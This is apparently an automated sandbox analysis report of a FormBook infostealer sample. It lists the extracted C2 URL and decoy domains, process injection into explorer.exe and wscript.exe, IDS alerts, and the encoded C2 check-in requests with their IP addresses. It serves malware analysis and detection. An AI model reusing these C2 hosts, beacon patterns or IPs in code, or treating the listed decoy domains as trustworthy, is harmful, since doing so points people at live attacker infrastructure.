      Source: 00000007.00000002.25335440666.00000000000B0000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.34652021.xyz/oe07/"], "decoy": ["wallyatwestminster.com", "wintimeslot.com", "lahustlesharder.net", "xn----7sbbah5aj7bmveh6d.top", "arieljewe.online", "hyle.finance", "sefulty.com", "heartofhuddersfield.com", "solarmovies1.com", "as930.com", "avi3p3g.top", "rvhotspots.com", "8nmzjhf3t7.xyz", "priorityfirst.info", "kleidermode.site", "elixirafricano-oficial.store", "changewithoutchurn.com", "ransbottompottery.com", "openhousebroward.com", "lafeestore.com", "trustedbystudents.co.uk", "globalshopf.online", "mkb-coach.online", "213215.com", "acceshire.net", "pro-pr.press", "bigcitygirl.net", "vivino.app", "xn--o39az44cuvdsyh.com", "b12-overdose.site", "stephenritson.com", "lygjllxs.com", "lovecuradora.com", "youpaihust.com", "sesliolur.com", "7h5ll.com", "afrokalegacy.com", "kumarmanoj.land", "yfxflg.com", "www55275.com", "byte.black", "xn--8prp8wjqv1gg513a.xn--55qx5d", "k-popquiz.com", "uniconsierge.com", "autodaohua.com", "58892.xyz", "onewayconnecting.online", "aaquii.com", "kiungte.xyz", "22525.top", "semimi.xyz", "capital5.xyz", "newpartnerlife.top", "python3.network", "transporthosike.net", "meizhuangs.com", "erinandroger.com", "qavsrwkg.top", "purposeandprofit.info", "yanyun.xyz", "annmingyehmd.com", "ypls.net", "marketingood.com", "vietnamwatch.site"]}
      Source: unknownHTTPS traffic detected: 109.94.209.55:443 -> 192.168.11.20:49780 version: TLS 1.2
      Source: Binary string: ieinstal.pdbGCTL source: wscript.exe, 0000000A.00000002.28718231919.0000000000488000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.28744695582.0000000004C7F000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000F.00000000.25843897827.000000003447F000.00000004.80000000.00040000.00000000.sdmp
      Source: Binary string: wscript.pdbGCTL source: ieinstal.exe, 00000007.00000002.25361078586.000000001E300000.00000040.10000000.00040000.00000000.sdmp, ieinstal.exe, 00000007.00000003.25328550602.000000001E4A1000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: ieinstal.pdb source: wscript.exe, 0000000A.00000002.28718231919.0000000000488000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.28744695582.0000000004C7F000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000F.00000000.25843897827.000000003447F000.00000004.80000000.00040000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000007.00000003.24880128513.000000001E478000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000003.24868071525.000000001E2D0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.25334031919.00000000043E0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.28741585528.000000000485D000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.25342803279.000000000458A000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.28733198562.0000000004730000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 00000007.00000003.24880128513.000000001E478000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000003.24868071525.000000001E2D0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.25334031919.00000000043E0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.28741585528.000000000485D000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.25342803279.000000000458A000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.28733198562.0000000004730000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: wscript.pdb source: ieinstal.exe, 00000007.00000002.25361078586.000000001E300000.00000040.10000000.00040000.00000000.sdmp, ieinstal.exe, 00000007.00000003.25328550602.000000001E4A1000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: firefox.pdb source: wscript.exe, 0000000A.00000003.25837285636.000000000586D000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.25899727561.000000000591A000.00000004.00000800.00020000.00000000.sdmp

      Networking

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 35.155.7.183 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 45.117.11.104 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 166.88.142.63 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 64.190.62.22 80Jump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 154.201.220.155 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 45.77.55.161 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 154.83.27.102 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 168.206.212.12 80Jump to behavior
      Snort IDS alert for network traffic
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49782 -> 166.88.142.63:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49782 -> 166.88.142.63:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49782 -> 166.88.142.63:80
      Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.11.20:59647 -> 1.1.1.1:53
      Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.11.20:53900 -> 1.1.1.1:53
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49792 -> 35.155.7.183:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49792 -> 35.155.7.183:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49792 -> 35.155.7.183:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49797 -> 45.77.55.161:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49797 -> 45.77.55.161:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49797 -> 45.77.55.161:80
      Performs DNS queries to domains with low reputation
      Source: DNS query: www.semimi.xyz
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: www.34652021.xyz/oe07/
      Source: Joe Sandbox ViewASN Name: INTECHONLINE-INIntechOnlinePrivateLimitedIN INTECHONLINE-INIntechOnlinePrivateLimitedIN
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /oe07/?lP=z6AX5nfHP&0HQL9628=VBCkGWN3mbdKL69djJN2rdDlRq/RNi1Yl7kVrt0lw4m93269gBnUi9nT/9PpDwJIl7i8 HTTP/1.1Host: www.meizhuangs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /oe07/?0HQL9628=ga39a5RGHObbQca0fqBpykiHYobf5FkgSDcrv7y+pUMgVC128FNTcyIMSfssoxfXuBjY&lP=z6AX5nfHP HTTP/1.1Host: www.priorityfirst.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /oe07/?0HQL9628=RmBYcxyFm1VObidM2bAa3CbHkvDDW3a9A6yXLZmuWUWj0+12Mlvgw6TkPXwNhL4XoXbq&lP=z6AX5nfHP HTTP/1.1Host: www.avi3p3g.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /oe07/?lP=z6AX5nfHP&0HQL9628=5L6t/KzdVSfbxfVudLgq0Mr4GOR7rghYMCaSZQk4P2LnHPgJfow90/TSCrfR2OXpDivu HTTP/1.1Host: www.python3.networkConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /oe07/?0HQL9628=5clOU3CSmsejcHs1r+/ykQ4Hy9FDmDDZKmpGOjyBkKFC3bezX8w0IGluu7zAR9IQ1uAi&lP=z6AX5nfHP HTTP/1.1Host: www.b12-overdose.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /oe07/?lP=z6AX5nfHP&0HQL9628=d5su3Z4iOwMZnhaJlYvQjVnFWUJeY1xeLTB2izYPxxrSUwfZ7XCIsMdyeMGBiIZ8vgNU HTTP/1.1Host: www.vivino.appConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /oe07/?0HQL9628=sLR7Kynk+A1Dhvlq5c1LtQV19otxtN9oy0czYRBh5HIDSu6LN2YXKPz/VtbWvZwWCPAY&lP=z6AX5nfHP HTTP/1.1Host: www.erinandroger.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /oe07/?lP=z6AX5nfHP&0HQL9628=66zN2ANa36y2SQxhNXKo0SAKr+1fbVR3z5i//1ienxLdBVM2rHrI4b7mKnIyPmnq8yDA HTTP/1.1Host: www.www55275.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 64.190.62.22 64.190.62.22
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 22 Aug 2022 18:04:28 GMTContent-Type: text/htmlContent-Length: 291ETag: "63026fa9-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Mon, 22 Aug 2022 18:06:56 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0Date: Mon, 22 Aug 2022 18:06:28 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f 68 31 3e 3c 2f 64 69
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0Date: Mon, 22 Aug 2022 18:06:30 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f 68 31 3e 3c 2f 64 69
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: wscript.exe, 0000000A.00000003.25837285636.000000000586D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: wscript.exe, 0000000A.00000003.25837285636.000000000586D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
      Source: wscript.exe, 0000000A.00000003.25837285636.000000000586D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
      Source: ieinstal.exe, 00000007.00000003.24875632393.0000000002CDD000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000003.24865745051.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000002.25342356021.0000000002CE1000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000003.24876789429.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000003.24875000752.0000000002CDB000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000003.24877240660.0000000002CDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: ieinstal.exe, 00000007.00000003.24875632393.0000000002CDD000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000003.24865745051.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000002.25342356021.0000000002CE1000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000003.24876789429.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000003.24875000752.0000000002CDB000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000003.24877240660.0000000002CDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: wscript.exe, 0000000A.00000003.25837285636.000000000586D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
      Source: wscript.exe, 0000000A.00000003.25837285636.000000000586D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
      Source: explorer.exe, 00000008.00000000.25156958656.0000000010A6C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25272325440.0000000010A6C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24993212931.0000000010E66000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25161566628.0000000010E66000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25274545356.0000000010E66000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25698238662.0000000010E66000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
      Source: wscript.exe, 0000000A.00000003.25837285636.000000000586D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
      Source: wscript.exe, 0000000A.00000003.25837285636.000000000586D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
      Source: wscript.exe, 0000000A.00000003.25837285636.000000000586D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: wscript.exe, 0000000A.00000003.25837285636.000000000586D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
      Source: wscript.exe, 0000000A.00000003.25837285636.000000000586D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
      Source: wscript.exe, 0000000A.00000002.28750799284.000000000516F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://img.sedoparking.com
      Source: powershell.exe, 00000003.00000002.25134750533.0000000005C56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: explorer.exe, 00000008.00000000.24993212931.0000000010E66000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25161566628.0000000010E66000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25274545356.0000000010E66000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/
      Source: explorer.exe, 00000008.00000000.25666494329.000000000D45A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25274545356.0000000010E66000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25092482311.0000000009A6A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24937524724.0000000009A6A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
      Source: explorer.exe, 00000008.00000000.25156958656.0000000010A6C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25272325440.0000000010A6C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25212115803.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25038476018.0000000000D68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24890121708.0000000000D68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24993212931.0000000010E66000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25161566628.0000000010E66000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25274545356.0000000010E66000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25698238662.0000000010E66000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
      Source: wscript.exe, 0000000A.00000003.25837285636.000000000586D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
